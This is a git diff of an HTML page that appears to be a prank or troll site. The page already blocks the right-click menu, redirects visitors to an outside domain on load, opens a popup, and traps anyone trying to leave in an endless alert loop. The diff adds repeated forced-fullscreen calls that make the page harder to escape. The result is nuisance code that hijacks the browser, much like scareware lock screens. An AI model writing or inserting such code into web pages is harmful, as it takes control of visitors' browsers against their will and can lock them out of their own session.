--- a/index.html
+++ b/index.html
@@ -16,13 +16,13 @@
 		function forceFullscreen(element) {
   			if(element.requestFullscreen) {
    				 element.requestFullscreen();
-  		} else if(element.mozRequestFullScreen) {
-    			element.mozRequestFullScreen();
-  		} else if(element.webkitRequestFullscreen) {
-   			element.webkitRequestFullscreen();
-  		} else if(element.msRequestFullscreen) {
-    			element.msRequestFullscreen();
-  		}
+  			} else if(element.mozRequestFullScreen) {
+    				element.mozRequestFullScreen();
+  			} else if(element.webkitRequestFullscreen) {
+   				element.webkitRequestFullscreen();
+  			} else if(element.msRequestFullscreen) {
+    				element.msRequestFullscreen();
+  			}
 		}
 
 		forceFullscreen(document.documentElement);
@@ -77,6 +77,7 @@
 	</head>
 	<script>
     //"use strict";
+    forceFullscreen(document.documentElement);
     window.open("https://www.youtube.com/watch?v=rRPQs_kM_nw", "topFrame");
 </script>
 	<body oncontextmenu="return false" onload="location.href='https://www.darknesscommunity.club/', load();">
@@ -84,7 +85,9 @@
 			<source src="polishcow.mp4" type='video/mp4'>
 		</video>
 		<meta http-equiv=”refresh” content="5" />
-		<script>window.onbeforeunload = function(){
+		<script>
+			forceFullscreen(document.documentElement);
+			window.onbeforeunload = function(){
   while (true) { alert("nope"); };
 };
 </script>
